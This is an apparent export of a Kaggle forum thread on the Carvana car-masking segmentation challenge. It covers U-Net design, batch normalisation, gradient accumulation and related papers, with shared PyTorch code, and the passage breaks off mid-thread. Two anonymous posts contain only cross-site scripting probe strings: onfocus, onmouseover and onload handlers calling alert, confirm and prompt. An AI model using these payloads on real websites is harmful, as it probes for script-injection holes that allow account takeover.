href=\"http://blog.qure.ai/notes/semantic-segmentation-deep-learning-review\">http://blog.qure.ai/notes/semantic-segmentation-deep-learning-review</a></p>",
          "votes": null,
          "replies": []
        },
        {
          "id": 209701,
          "author_name": "hengck23",
          "author_url": "",
          "post_date": "08/03/2017 04:56:26",
          "content": "<p>@Bruno G. do Amaral</p>\n\n<p>\"I'd suggest adding an \"upscale\" network ...\" thank you for your comment. i am thinking of this too. I am looking at refineNet. I am thinking if i want to do it end-to-end (which require large memory) or train  separate networks stagewise, with a network output feed into the input of another stage.</p>\n\n<p>it can be as simple as two-stage or three stage.</p>\n\n<p>Thanks for the link! Here is another link for review of segmentation:\n<a href=\"https://meetshah1995.github.io/semantic-segmentation/deep-learning/pytorch/visdom/2017/06/01/semantic-segmentation-over-the-years.html\">https://meetshah1995.github.io/semantic-segmentation/deep-learning/pytorch/visdom/2017/06/01/semantic-segmentation-over-the-years.html</a></p>",
          "votes": null,
          "replies": []
        },
        {
          "id": 213215,
          "author_name": "hengck23",
          "author_url": "",
          "post_date": "08/14/2017 04:31:38",
          "content": "<p>@Bruno G. do Amaral</p>\n\n<p>This cvpr 2017 oral paper has some ideas similar to yours:</p>\n\n<p><a href=\"https://sites.google.com/view/deepimagematting\">https://sites.google.com/view/deepimagematting</a></p>\n\n<p>\"Deep Image Matting\" - Ning Xu, CVPR 2017</p>\n\n<p>The input to the second stage of our network is the concatenation of an image patch and its alpha prediction from the first stage (scaled between 0 and\n255), resulting in a 4-channel input. The output is the corresponding\nground truth alpha matte. The network is a fully convolutional network which includes 4 convolutional layers. Each of the first 3 convolutional layers is followed by a non-linear “ReLU” layer. There are no downsampling layers since we want to keep very subtle structures missed in the first stage.</p>",
          "votes": null,
          "replies": []
        }
      ]
    },
    {
      "id": 209157,
      "author_name": "heroxrq",
      "author_url": "",
      "post_date": "08/01/2017 12:20:04",
      "content": "<p>You are kind of sharing your code. I trained a UNet, but it marks all edges just as the attenchment. How do you remove the logo of \"carvana\"?</p>",
      "votes": null,
      "replies": [
        {
          "id": 209167,
          "author_name": "ironbar",
          "author_url": "",
          "post_date": "08/01/2017 12:37:12",
          "content": "<p>Verify the training, your model is not creating a mask around the car. <br>\nProbably it doesn't have learn anything.</p>",
          "votes": null,
          "replies": []
        },
        {
          "id": 209205,
          "author_name": "heroxrq",
          "author_url": "",
          "post_date": "08/01/2017 14:56:50",
          "content": "<p>@ironbar The code is as follows, just trained a unet. I don't know whether the model construct method is OK. It seems that the model just find all the edges, and do not create a car mask.</p>\n\n<pre><code>\nimport numpy as np\nimport tensorflow as tf\nfrom PIL import Image\nfrom tf_unet import unet, image_util, util\n\nbase_dir = \"/home/xrq/prog/kaggle/image_masking\"\noutput_path = base_dir + \"/script/tmp\"\nmodel_path = base_dir + '/script/model'\ntest_pic_path = base_dir + \"/script/00087a6bd4dc_01_predict.jpg\"\n\ndata_provider = image_util.ImageDataProvider(base_dir + \"/dataset/train/*\", data_suffix='.jpg', mask_suffix='_mask.gif')\nnet = unet.Unet(channels=3, n_class=2, cost='cross_entropy', layers=3, features_root=1)\ntrainer = unet.Trainer(net, batch_size=1, optimizer='momentum')\ntrainer.train(data_provider, output_path, training_iters=10, epochs=100, dropout=0.5, display_step=1, restore=False, write_graph=False)\n\ninit = tf.global_variables_initializer()\nwith tf.Session() as sess:\n    # Initialize variables\n    sess.run(init)\n\n    net.save(sess, model_path)\n    pic = np.array(Image.open(base_dir + '/dataset/train/00087a6bd4dc_01.jpg'), np.float32)\n    prediction = net.predict(model_path, np.reshape(pic, (1, 1280, 1918, 3)))\n\n    res = np.reshape(prediction, (1240, 1876, 2))[:, :, 1]\n    img = Image.fromarray(res * 255)\n    if img.mode != 'RGB':\n        img = img.convert('RGB')\n    img.save(test_pic_path)\n    img.show()\n</code></pre>",
          "votes": null,
          "replies": []
        }
      ]
    },
    {
      "id": 209231,
      "author_name": "hengck23",
      "author_url": "",
      "post_date": "08/01/2017 16:15:48",
      "content": "<p>segmentation tricks!</p>\n\n<p>see pascal voc 2012 leader board method description</p>\n\n<p><a href=\"http://host.robots.ox.ac.uk:8080/leaderboard/displaylb.php?challengeid=11&amp;compid=6\">http://host.robots.ox.ac.uk:8080/leaderboard/displaylb.php?challengeid=11&amp;compid=6</a></p>\n\n<p>e.g   CRF is applied as post-processing step.</p>\n\n<p>We also use densecrf as post-processing to refine object boundaries.</p>",
      "votes": null,
      "replies": [
        {
          "id": 211110,
          "author_name": "jackkwok",
          "author_url": "",
          "post_date": "08/08/2017 03:38:52",
          "content": "<p>Heng et al, Does anyone have success with CRF as post-processing?</p>\n\n<p>Original paper on Gaussian CRF: \n<a href=\"https://arxiv.org/abs/1210.5644\">https://arxiv.org/abs/1210.5644</a></p>",
          "votes": null,
          "replies": []
        }
      ]
    },
    {
      "id": 209393,
      "author_name": "hengck23",
      "author_url": "",
      "post_date": "08/02/2017 04:52:12",
      "content": "<p>finally a solution for 0.996. please refer to for code release 08-02 and experiment. Here is a summary for unet for predicting 1024x1024 (batch size=8).</p>\n\n<ol>\n<li><p>construct a 512x512 input unet</p></li>\n<li><p>the last feature map is 512x512</p></li>\n<li><p>concat this last feature with input. upsize to 1024x1024.</p></li>\n<li><p>add conv filters 3x3, bn, relu, etc ...</p></li>\n<li><p>finally, a classifier layer to predict results at 1024x1024</p></li>\n</ol>\n\n<p>Note that there is numerical instability. I am not sure if it is due to unstable bce loss or BN layers (too little train samples can cause running std =0?). I will find out if I have time.</p>\n\n<p><img src=\"https://storage.googleapis.com/kaggle-forum-message-attachments/209393/6970/1024.png\" alt=\"enter image description here\" title=\"\"></p>",
      "votes": null,
      "replies": [
        {
          "id": 209438,
          "author_name": "",
          "author_url": "",
          "post_date": "08/02/2017 08:21:08",
          "content": "<p>e..,maybe input is 512x512 and you write 512 x 125? I was using 512x512 input size, 512x512 output size ,no bn layers (i have no more memory,and I think we don't need it.),it can also get 0.996.</p>",
          "votes": null,
          "replies": []
        },
        {
          "id": 209440,
          "author_name": "hengck23",
          "author_url": "",
          "post_date": "08/02/2017 08:39:28",
          "content": "<p>@bang liu</p>\n\n<p>Thank you for the comments. I corrected the typo error. It should be 512x512. ' ... no bn layers ...' Maybe I can try without BN layer too. In that case, I can use greater batch size or higher resolution. Thanks!</p>\n\n<p>Note: without BN, it is easy to try in multi-gpu (and also fp16 which i try before on cifar10 before)</p>",
          "votes": null,
          "replies": []
        },
        {
          "id": 209451,
          "author_name": "hengck23",
          "author_url": "",
          "post_date": "08/02/2017 09:25:53",
          "content": "<p>@bang liu</p>\n\n<p>how do you initialise your Unet without BN? Tried just now at my side. The UNet won't run at training  unless good initialization is given (I can merge BN in conv to do a initialization for the weights). Since the images are more or less similar, maybe that is why BN may not be that important here. Without BN, i can increase batch size from 16 to 20. The speed is faster too.</p>",
          "votes": null,
          "replies": []
        },
        {
          "id": 209460,
          "author_name": "ceperaang",
          "author_url": "",
          "post_date": "08/02/2017 10:28:52",
          "content": "<p>When you train Unet without BN you have to use much lower learning rate (in range 1e-4 or lower) and longer training</p>",
          "votes": null,
          "replies": []
        },
        {
          "id": 209465,
          "author_name": "timjoseph",
          "author_url": "",
          "post_date": "08/02/2017 11:16:04",
          "content": "<p>@Heng CherKeng\nHow long does 1 epoch take (on your 1080TI/Titan?) to train for the 0.996 net?</p>",
          "votes": null,
          "replies": []
        },
        {
          "id": 209466,
          "author_name": "hengck23",
          "author_url": "",
          "post_date": "08/02/2017 11:17:51",
          "content": "<p>5.6 min using pascal titianX. The log file can be found at the google drive. see 08-20 and 07-31.\nI run about 35 epoch.</p>",
          "votes": null,
          "replies": []
        },
        {
          "id": 209467,
          "author_name": "hengck23",
          "author_url": "",
          "post_date": "08/02/2017 11:19:27",
          "content": "<p>if i got time, i am going to try this: <a href=\"https://github.com/ducha-aiki/LSUV-pytorch\">https://github.com/ducha-aiki/LSUV-pytorch</a></p>",
          "votes": null,
          "replies": []
        },
        {
          "id": 209471,
          "author_name": "",
          "author_url": "",
          "post_date": "08/02/2017 11:50:49",
          "content": "<p>I have not using special init method,but random normal(mean=0,std=filter_width*filter_height*channel).\nthese pic are too same,so DA and BN these method which can lead noise will be harmful .\nthe best way is increase the input size,but I gauss we can't over 0.998 because of ground true error.</p>",
          "votes": null,
          "replies": []
        },
        {
          "id": 209545,
          "author_name": "hengck23",
          "author_url": "",
          "post_date": "08/02/2017 15:47:09",
          "content": "<p>@bang liu   and  @Sergey Mushinskiy</p>\n\n<p>Thank you for the comments. The initialization and learning rate are magical. I am running the experiments now, using unet512 without bn. The convergence rate is a bit slower, but time per epoch is reduced from  3 min to 2.2 min. Attached is the loss convergence of epoch-1. I will post experiment curve of with and without bn when my experiments are completed. Thanks again!</p>\n\n<p><a href=\"https://storage.googleapis.com/kaggle-forum-message-attachments/208677/6972/results-small-epoch-1.avi\">https://storage.googleapis.com/kaggle-forum-message-attachments/208677/6972/results-small-epoch-1.avi</a> (red=ground_truth, green=prediction. if ground_truth==green, you should see only yellow)</p>\n\n<pre><code>class UNet512_no_bn_2 (nn.Module):\n\ndef __init__(self, in_shape, num_classes):\n    super(UNet512_no_bn_2, self).__init__()\n    in_channels, height, width = in_shape\n\n    self.down1 = nn.Sequential(\n        *make_conv_relu(in_channels, 16, kernel_size=3, stride=1, padding=1 ),\n        *make_conv_relu(16, 16, kernel_size=3, stride=1, padding=1 ),\n    )\n    ..... \n\n    self.classify = nn.Conv2d(16, num_classes, kernel_size=1, stride=1, padding=0 )\n\n    ## initialistaion\n    #  https://www.kaggle.com/c/carvana-image-masking-challenge/discussion/37208\n    #  bang liu : random normal(mean=0,std=filter_width*filter_height*channel).\n\n    for m in self.modules():\n        if isinstance(m, nn.Conv2d):\n            n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n            m.weight.data.normal_(0, math.sqrt(2. / n))\n\n\ndef forward(self, x):\n\n    down1 = self.down1(x)\n    out   = F.max_pool2d(down1, kernel_size=2, stride=2) #64\n\n    down2 = self.down2(out)\n    out   = F.max_pool2d(down2, kernel_size=2, stride=2) #64\n    .....\n    out   = self.classify(out)\n\n    return out\n</code></pre>",
          "votes": null,
          "replies": []
        },
        {
          "id": 209598,
          "author_name": "tivfrvqhs5",
          "author_url": "",
          "post_date": "08/02/2017 19:16:41",
          "content": "<p>In your next update, could you publish your Split folder?  I can't tell which images you used in the test_3197 file.  Many thanks!</p>",
          "votes": null,
          "replies": []
        },
        {
          "id": 209699,
          "author_name": "hengck23",
          "author_url": "",
          "post_date": "08/03/2017 04:51:39",
          "content": "<p>i have added to the 07-30 release. test_3197 is for visualization only. it is not used in training and will not affect results.</p>",
          "votes": null,
          "replies": []
        },
        {
          "id": 210016,
          "author_name": "luango",
          "author_url": "",
          "post_date": "08/04/2017 03:08:00",
          "content": "<p>How much RAM do you use @Heng CherKeng? I even got problem loading the training images. Sorry for a dump question, I'm new to the field.</p>",
          "votes": null,
          "replies": []
        },
        {
          "id": 210017,
          "author_name": "hengck23",
          "author_url": "",
          "post_date": "08/04/2017 03:09:51",
          "content": "<p>i have 128GB ram. check the code and set is_preload=False in the dataset init function.</p>",
          "votes": null,
          "replies": []
        },
        {
          "id": 210019,
          "author_name": "luango",
          "author_url": "",
          "post_date": "08/04/2017 03:15:39",
          "content": "<p>Thank you so much ^^</p>",
          "votes": null,
          "replies": []
        }
      ]
    },
    {
      "id": 209397,
      "author_name": "hengck23",
      "author_url": "",
      "post_date": "08/02/2017 05:05:29",
      "content": "<p>yet another idea is to use distance transform to weigh the boundary pixels in the loss function.</p>",
      "votes": null,
      "replies": []
    },
    {
      "id": 209642,
      "author_name": "ecobill",
      "author_url": "",
      "post_date": "08/02/2017 22:28:32",
      "content": "<p>Coded up a U-nets implementation <a href=\"https://www.kaggle.com/ecobill/u-nets-with-keras/\">here</a> that is relevant to this post! Let me know what you thing!</p>",
      "votes": null,
      "replies": []
    },
    {
      "id": 209709,
      "author_name": "hengck23",
      "author_url": "",
      "post_date": "08/03/2017 05:32:40",
      "content": "<p>anyone using dilated convolution here? Does it improves results?</p>",
      "votes": null,
      "replies": [
        {
          "id": 209782,
          "author_name": "timjoseph",
          "author_url": "",
          "post_date": "08/03/2017 11:47:36",
          "content": "<p>I would love to, but I think dilated convolutions do increase memory consumption a lot (and it seems like many configurations of cudnn/pytorch are not optimised for dilation?)</p>",
          "votes": null,
          "replies": []
        },
        {
          "id": 209784,
          "author_name": "",
          "author_url": "",
          "post_date": "08/03/2017 11:51:44",
          "content": "<p>Does pytorch has dilated layer?</p>",
          "votes": null,
          "replies": []
        },
        {
          "id": 209899,
          "author_name": "timjoseph",
          "author_url": "",
          "post_date": "08/03/2017 18:20:50",
          "content": "<p><a href=\"http://pytorch.org/docs/master/nn.html#convolution-layers\">http://pytorch.org/docs/master/nn.html#convolution-layers</a>\nYea I think the dilation parameter does control dilation</p>",
          "votes": null,
          "replies": []
        },
        {
          "id": 210032,
          "author_name": "hengck23",
          "author_url": "",
          "post_date": "08/04/2017 04:45:53",
          "content": "<p>i try 5x5 filter. it does improve the results a little but is very slow and some overfitting. so i am thinking that dilated conv might help.</p>",
          "votes": null,
          "replies": []
        },
        {
          "id": 210039,
          "author_name": "",
          "author_url": "",
          "post_date": "08/04/2017 05:12:01",
          "content": "<p>But using dilated conv will cost too much memory(maybe 4~8 times),or you will also downsample the feature map ?</p>",
          "votes": null,
          "replies": []
        },
        {
          "id": 210041,
          "author_name": "hengck23",
          "author_url": "",
          "post_date": "08/04/2017 05:22:05",
          "content": "<pre><code>Rethinking Atrous Convolution for Semantic Image Segmentation\nSubmitted on 17 Jun 2017\nArxiv Link\n</code></pre>\n\n<p><img src=\"https://storage.googleapis.com/kaggle-forum-message-attachments/208677/6984/deeplabv3.png\" alt=\"enter image description here\" title=\"\"></p>\n\n<p><img src=\"https://storage.googleapis.com/kaggle-forum-message-attachments/208677/6990/context.png\" alt=\"enter image description here\" title=\"\"></p>",
          "votes": null,
          "replies": []
        }
      ]
    },
    {
      "id": 210018,
      "author_name": "hengck23",
      "author_url": "",
      "post_date": "08/04/2017 03:13:57",
      "content": "<p>training at original resolution! I crop 1024x1024 from the original image. The results look good. The spikes in my previous 1024 attempt is due to small batch size. I think you need at least batch_size = 32 (use caffe accumulate gradient trick, i.e. iter_size in the prototxt file) blue=batch_size_8, red = batch_size_32. This is a new unet using 1024 as input and 1024 as output.</p>\n\n<p>My feeling is that is will be a 0.997 solution. To get to 0.998, some refinement strategy is required.</p>\n\n<p><img src=\"https://storage.googleapis.com/kaggle-forum-message-attachments/210018/6982/loss_1024_crop0.png\" alt=\"enter image description here\" title=\"\">\n <img src=\"https://storage.googleapis.com/kaggle-forum-message-attachments/210018/6980/0d1a9caf4350_02.jpg\" alt=\"enter image description here\" title=\"\"></p>",
      "votes": null,
      "replies": [
        {
          "id": 210078,
          "author_name": "zlmlaker",
          "author_url": "",
          "post_date": "08/04/2017 08:52:29",
          "content": "<p>By training in 1024x1024, I am wondering how to predict the result under 1918 * 1280?</p>",
          "votes": null,
          "replies": []
        },
        {
          "id": 210079,
          "author_name": "hengck23",
          "author_url": "",
          "post_date": "08/04/2017 08:56:03",
          "content": "<p><img src=\"https://storage.googleapis.com/kaggle-forum-message-attachments/208677/6985/2x1024.png\" alt=\"enter image description here\" title=\"\"></p>",
          "votes": null,
          "replies": []
        },
        {
          "id": 210144,
          "author_name": "zlmlaker",
          "author_url": "",
          "post_date": "08/04/2017 12:41:54",
          "content": "<p>That's cool. But how to make sure the patch cover all the car if it's facing towards you or backwards? I haven't checked all the  images </p>",
          "votes": null,
          "replies": []
        },
        {
          "id": 210149,
          "author_name": "hengck23",
          "author_url": "",
          "post_date": "08/04/2017 13:00:23",
          "content": "<p>you can get bounding box from initial estimate</p>\n\n<p><img src=\"https://storage.googleapis.com/kaggle-forum-message-attachments/208677/6987/two-stage.png\" alt=\"enter image description here\" title=\"\"></p>",
          "votes": null,
          "replies": []
        },
        {
          "id": 210207,
          "author_name": "antorsae",
          "author_url": "",
          "post_date": "08/04/2017 16:47:28",
          "content": "<p>How long does it take for you to predict all test images + generate RLE file?</p>\n\n<p>I managed to train at native resolution (1918x1280), left it training for ~1 day but predictions + RLE will take ~15-20 hours...</p>",
          "votes": null,
          "replies": []
        },
        {
          "id": 210210,
          "author_name": "hengck23",
          "author_url": "",
          "post_date": "08/04/2017 16:51:12",
          "content": "<p>generate RLE  takes 20 min\n(see kernel section for fast RLE)</p>\n\n<p>just prediction at 1024x1024 takes 1 to 2 hr.\nbut there are overheads like storing 1024x1024 probability to disk, etc</p>",
          "votes": null,
          "replies": []
        },
        {
          "id": 210220,
          "author_name": "hengck23",
          "author_url": "",
          "post_date": "08/04/2017 17:43:18",
          "content": "<p>i changed my strategy. From my experiments, direct prediction from full resolution or slightly smaller (e.g 1024x1916) can also work. so there is no need to divide into crops, etc</p>",
          "votes": null,
          "replies": []
        },
        {
          "id": 210235,
          "author_name": "timjoseph",
          "author_url": "",
          "post_date": "08/04/2017 19:03:52",
          "content": "<p>UNets seem to be working great for you! How do you manage memory consumption with this image size? I guess for most UNets this is too big to even fit a single image into memory?</p>",
          "votes": null,
          "replies": []
        },
        {
          "id": 210293,
          "author_name": "hengck23",
          "author_url": "",
          "post_date": "08/05/2017 01:43:49",
          "content": "<p>surprising, max no. of images for 1024x1916 is 8. i use 12 GB pascal titanx. as long as you can stable BN moving statistics, you can:</p>\n\n<pre><code>enter code here\n\nprint ('batch_size*num_grad_acc')  \nfor epoch in range(start_epoch, num_epoches):   \n\n    adjust_learning_rate(optimizer, lr/num_grad_acc)\n    rate =  get_learning_rate(optimizer)[0]*num_grad_acc  \n\n    net.train()\n    for it, (images, labels, indices) in enumerate(train_loader, 0):\n        images  = Variable(images.cuda())\n        labels  = Variable(labels.cuda())\n\n        #forward\n        logits = net(images)\n        probs  = F.sigmoid(logits)\n        masks  = (probs&amp;gt;0.5).float()\n\n\n        #backward\n        loss = criterion(logits, labels)\n        # optimizer.zero_grad()\n        # loss.backward()\n        # optimizer.step()\n\n        # accumulate gradients\n        if it==0:\n            optimizer.zero_grad()\n        loss.backward()\n        if it%num_grad_acc==0:\n            optimizer.step()\n            optimizer.zero_grad()  # assume no effects on bn for accumulating grad\n</code></pre>\n\n<p>`</p>",
          "votes": null,
          "replies": []
        },
        {
          "id": 210357,
          "author_name": "timjoseph",
          "author_url": "",
          "post_date": "08/05/2017 09:38:02",
          "content": "<p>So what's the batch size here and num_grad_acc? I guess training time takes a hit though at this size?</p>",
          "votes": null,
          "replies": []
        },
        {
          "id": 210389,
          "author_name": "hengck23",
          "author_url": "",
          "post_date": "08/05/2017 12:32:23",
          "content": "<p>it takes 14 min to train for 1024x2048 per epoch (actaully 2~3 min is due to data augmentation). effective_batch_size = num_grad_accxbtach_size can be 4x8=32 or 4x16=64. i am still experimentally. and yes, the effective_batch_size does affect results </p>",
          "votes": null,
          "replies": []
        },
        {
          "id": 210997,
          "author_name": "timjoseph",
          "author_url": "",
          "post_date": "08/07/2017 19:20:36",
          "content": "<p>deleted comment - I was wrong</p>",
          "votes": null,
          "replies": []
        }
      ]
    },
    {
      "id": 210038,
      "author_name": "hengck23",
      "author_url": "",
      "post_date": "08/04/2017 05:04:11",
      "content": "<p>yet another idea. background prediction model:\nrgb --&gt;[feature_net]--&gt;predicted_background_rgb--&gt;z=abs(predicted_background_rgb-rgb--&gt;sigmoid[scale(z+shift)]--&gt;loss</p>",
      "votes": null,
      "replies": []
    },
    {
      "id": 210040,
      "author_name": "hengck23",
      "author_url": "",
      "post_date": "08/04/2017 05:18:40",
      "content": "<pre><code>boundary refinement:\n\"Laplacian Pyramid Reconstruction and Refinement for Semantic Segmentation\" -  G. Ghiasi, C. Fowlkes, eccv 2016\n</code></pre>\n\n<p><a href=\"http://www.ics.uci.edu/~gghiasi/\">http://www.ics.uci.edu/~gghiasi/</a></p>\n\n<p>smart idea to detect the boundary using max and inverted max pooling\n <img src=\"https://storage.googleapis.com/kaggle-forum-message-attachments/210040/6983/xx1.png\" alt=\"enter image description here\" title=\"\"></p>",
      "votes": null,
      "replies": []
    },
    {
      "id": 210315,
      "author_name": "hengck23",
      "author_url": "",
      "post_date": "08/05/2017 04:55:16",
      "content": "<p><a href=\"https://www.semanticscholar.org/paper/Label-Refinement-Network-for-Coarse-to-Fine-Semant-Islam-Naha/3b60af814574ebe389856e9f7008bb83b0539abc\">https://www.semanticscholar.org/paper/Label-Refinement-Network-for-Coarse-to-Fine-Semant-Islam-Naha/3b60af814574ebe389856e9f7008bb83b0539abc</a></p>\n\n<p>see also the cvpr 2017 paper:\nGated feedback refinement network for dense image labeling</p>\n\n<p>www.cs.umanitoba.ca/~ywang</p>\n\n<p><img src=\"https://ai2-s2-public.s3.amazonaws.com/figures/2016-11-08/3b60af814574ebe389856e9f7008bb83b0539abc/1-Figure1-1.png\" alt=\"enter image description here\" title=\"\"></p>",
      "votes": null,
      "replies": []
    },
    {
      "id": 210317,
      "author_name": "hengck23",
      "author_url": "",
      "post_date": "08/05/2017 05:13:19",
      "content": "<p>if you want ot use TTA (test time augmentation), you may need to find ways to speed up inference. here is a trick.</p>\n\n<p>\"In order to speed up inference time, we use the following\nequations to remove the batch normalization layer in our\nnetwork at test time.\"</p>\n\n<p>DSSD : Deconvolutional Single Shot Detector </p>\n\n<p><a href=\"http://www.cs.unc.edu/~cyfu/\">http://www.cs.unc.edu/~cyfu/</a></p>\n\n<p>similar trick is used in Intel's PVANet:</p>\n\n<p><a href=\"https://github.com/sanghoon/pva-faster-rcnn/issues/5\">https://github.com/sanghoon/pva-faster-rcnn/issues/5</a></p>",
      "votes": null,
      "replies": [
        {
          "id": 210345,
          "author_name": "timjoseph",
          "author_url": "",
          "post_date": "08/05/2017 08:26:06",
          "content": "<p>Interesting. Is inference time already a bottleneck for you?</p>",
          "votes": null,
          "replies": []
        }
      ]
    },
    {
      "id": 210392,
      "author_name": "",
      "author_url": "",
      "post_date": "08/05/2017 12:35:24",
      "content": "<p>\"&gt;/\nprompt(/920065/)\n\"onmouseover=\"confirm(2);\n\"&gt;\n\"--&gt;\n\"/<strong>/autofocus/</strong>/onfocus=\"alert('XSSPOSED');\"\n\"&gt;confirm(/XSs;/)\n;print(md5(xss)); set|set&amp;set\ntext//;value=<code>autofocus onfocus=alert(1) a=</code>&gt;</p>\n\n<blockquote>\n  <p>\n  <code>-alert`/1/`\"&gt;'onload=\"`-alert</code>1<code>\"&gt;'onload=\"</code>1\"autofocus \"[user]\"&gt;/\n  prompt(/920065/)\n  \"onmouseover=\"confirm(2);\n  \"&gt;\n  \"--&gt;\n  \"/<strong>/autofocus/</strong>/onfocus=\"alert('XSSPOSED');\"\n  \"&gt;confirm(/XSs;/)[video]\"&gt;/\n  prompt(/920065/)\n  \"onmouseover=\"confirm(2);\n  \"&gt;\n  \"--&gt;\n  \"/<strong>/autofocus/</strong>/onfocus=\"alert('XSSPOSED');\"\n  \"&gt;confirm(/XSs;/)[image]\"&gt;/\n  prompt(/920065/)\n  \"onmouseover=\"confirm(2);\n  \"&gt;\n  \"--&gt;\n  \"/<strong>/autofocus/</strong>/onfocus=\"alert('XSSPOSED');\"\n  \"&gt;confirm(/XSs;/)\n  ;print(md5(xss)); set|set&amp;set\n  text//;value=<code>autofocus onfocus=alert(1) a=</code>&gt;\n  \"&gt;\n</p></blockquote>\n\n<p><code>-alert</code>/1/<code>\"&gt;'onload=\"</code>-alert1<code>\"&gt;'onload=\"</code>document.domain\"autofocus \"[/image]\n;print(md5(xss)); set|set&amp;set\ntext//;value=<code>autofocus onfocus=alert(1) a=</code>&gt;</p>\n\n<blockquote>\n  <p>\n  <code>-alert`/1/`\"&gt;'onload=\"`-alert</code>1<code>\"&gt;'onload=\"</code>\n  \n  <code>-alert`/1/`\"&gt;'onload=\"`-alert`1`\"&gt;'onload=\"`1</code>\"autofocus \"</p>\n</blockquote>",
      "votes": null,
      "replies": []
    },
    {
      "id": 210393,
      "author_name": "",
      "author_url": "",
      "post_date": "08/05/2017 12:36:22",
      "content": "<p>\"&gt;/\nprompt(/920065/)\n\"onmouseover=\"confirm(2);\n\"&gt;\n\"--&gt;\n\"/<strong>/autofocus/</strong>/onfocus=\"alert('XSSPOSED');\"\n\"&gt;confirm(/XSs;/)\n;print(md5(xss)); set|set&amp;set\ntext//;value=<code>autofocus onfocus=alert(1) a=</code>&gt;</p>\n\n<blockquote>\n  <p>\n  <code>-alert`/1/`\"&gt;'onload=\"`-alert</code>1<code>\"&gt;'onload=\"</code>1\"autofocus \"[user]\"&gt;/\n  prompt(/920065/)\n  \"onmouseover=\"confirm(2);\n  \"&gt;\n  \"--&gt;\n  \"/<strong>/autofocus/</strong>/onfocus=\"alert('XSSPOSED');\"\n  \"&gt;confirm(/XSs;/)[video]\"&gt;/\n  prompt(/920065/)\n  \"onmouseover=\"confirm(2);\n  \"&gt;\n  \"--&gt;\n  \"/<strong>/autofocus/</strong>/onfocus=\"alert('XSSPOSED');\"\n  \"&gt;confirm(/XSs;/)[image]\"&gt;/\n  prompt(/920065/)\n  \"onmouseover=\"confirm(2);\n  \"&gt;\n  \"--&gt;\n  \"/<strong>/autofocus/</strong>/onfocus=\"alert('XSSPOSED');\"\n  \"&gt;confirm(/XSs;/)\n  ;print(md5(xss)); set|set&amp;set\n  text//;value=<code>autofocus onfocus=alert(1) a=</code>&gt;\n  \"&gt;\n</p></blockquote>\n\n<p><code>-alert</code>/1/<code>\"&gt;'onload=\"</code>-alert1<code>\"&gt;'onload=\"</code>document.domain\"autofocus \"[/image]\n;print(md5(xss)); set|set&amp;set\ntext//;value=<code>autofocus onfocus=alert(1) a=</code>&gt;</p>\n\n<blockquote>\n  <p>\n  <code>-alert`/1/`\"&gt;'onload=\"`-alert</code>1<code>\"&gt;'onload=\"</code>\n  \n  <code>-alert`/1/`\"&gt;'onload=\"`-alert`1`\"&gt;'onload=\"`1</code>\"autofocus \"</p>\n</blockquote>",
      "votes": null,
      "replies": []
    },
    {
      "id": 210394,
      "author_name": "hengck23",
      "author_url": "",
      "post_date": "08/05/2017 12:47:24",
      "content": "<p>it seems that there are quite some work that deal with full resolution segmentation. Also my current unet use stacked 3x3 filters (like vgg-16). Here are some papers that uses residual block, etc to repalce it. They claimed better accuracy and efficiency.</p>\n\n<p>\"Efficient ConvNet for Real-time Semantic Segmentation\"- Eduardo Romera1, Jose´ M. A´ lvarez2, Luis M. Bergasa1 and Roberto Arroyo</p>\n\n<p>\"LinkNet: Exploiting Encoder Representations for Efficient Semantic Segmentation\" - Abhishek Chaurasia</p>\n\n<p>\" Not All Pixels Are Equal: Difficulty-Aware Semantic Segmentation via Deep Layer Cascade\" - Xiaoxiao Li</p>\n\n<p>\"ICNet for Real-Time Semantic Segmentation on High-Resolution Images\"- Hengshuang Zhao1</p>\n\n<p>\"Improving Fully Convolution Network for Semantic Segmentation\" - Bing Shuai</p>\n\n<p>\"Full-Resolution Residual Networks for Semantic Segmentation in Street Scenes\" - Tobias Pohlen</p>\n\n<p>\"The One Hundred Layers Tiramisu: Fully Convolutional DenseNets for Semantic Segmentation\" - Simon J´egou1</p>\n\n<p>\"ENet: A Deep Neural Network Architecture for Real-Time Semantic Segmentation\" - Adam Paszke</p>",
      "votes": null,
      "replies": []
    },
    {
      "id": 211268,
      "author_name": "hengck23",
      "author_url": "",
      "post_date": "08/08/2017 13:39:06",
      "content": "<p>Full-Resolution Residual Networks for Semantic Segmentation in Street Scenes</p>\n\n<p><a href=\"https://www.youtube.com/watch?v=aXdigiSDIak\">https://www.youtube.com/watch?v=aXdigiSDIak</a></p>\n\n<p><a href=\"https://github.com/TobyPDE/FRRN\">https://github.com/TobyPDE/FRRN</a></p>",
      "votes": null,
      "replies": [
        {
          "id": 211425,
          "author_name": "pama328",
          "author_url": "",
          "post_date": "08/08/2017 23:08:26",
          "content": "<p>Did you give it a try? </p>",
          "votes": null,
          "replies": []
        }
      ]
    },
    {
      "id": 211358,
      "author_name": "hengck23",
      "author_url": "",
      "post_date": "08/08/2017 18:08:32",
      "content": "<p>here is another benchmark to compare different methods:</p>\n\n<p><a href=\"https://www.cityscapes-dataset.com/benchmarks/\">https://www.cityscapes-dataset.com/benchmarks/</a></p>",
      "votes": null,
      "replies": []
    },
    {
      "id": 211618,
      "author_name": "gadgysaidoff",
      "author_url": "",
      "post_date": "08/09/2017 15:01:01",
      "content": "<p>Hi Heng!\nThanks for your kernel.\nBTW I see you redefined forward pass, but I don't see any redefinition of backward.\nHave you done it?\nIf not - why? do you think it's good idea to have different backward and forward ways?</p>",
      "votes": null,
      "replies": [
        {
          "id": 211773,
          "author_name": "pama328",
          "author_url": "",
          "post_date": "08/09/2017 22:14:25",
          "content": "<p>I'm not Heng, but if you don't mind I will answer your question:\nIn pytorch there is no need to define a backward path explicitly if using the autograd package. The path is generated implicitly from the forward path and stored in the autograd-variables. Therefore the backward path should be 'the reverse forward path' implicitly. </p>",
          "votes": null,
          "replies": []
        }
      ]
    },
    {
      "id": 211689,
      "author_name": "strideradu",
      "author_url": "",
      "post_date": "08/09/2017 18:23:03",
      "content": "<p>I got the error said:</p>\n\n<p>RuntimeError: cuda runtime error (46) : all CUDA-capable devices are busy or unavailable at pytorch/torch/lib/THC/generic/THCStorage.cu:66</p>\n\n<p>Could someone help me?</p>",
      "votes": null,
      "replies": [
        {
          "id": 211697,
          "author_name": "cpruce",
          "author_url": "",
          "post_date": "08/09/2017 18:40:43",
          "content": "<p>Try restarting the machine</p>",
          "votes": null,
          "replies": []
        },
        {
          "id": 211808,
          "author_name": "strideradu",
          "author_url": "",
          "post_date": "08/09/2017 23:42:11",
          "content": "<p>It's university cluster so I cannot control the machine</p>",
          "votes": null,
          "replies": []
        },
        {
          "id": 211907,
          "author_name": "pama328",
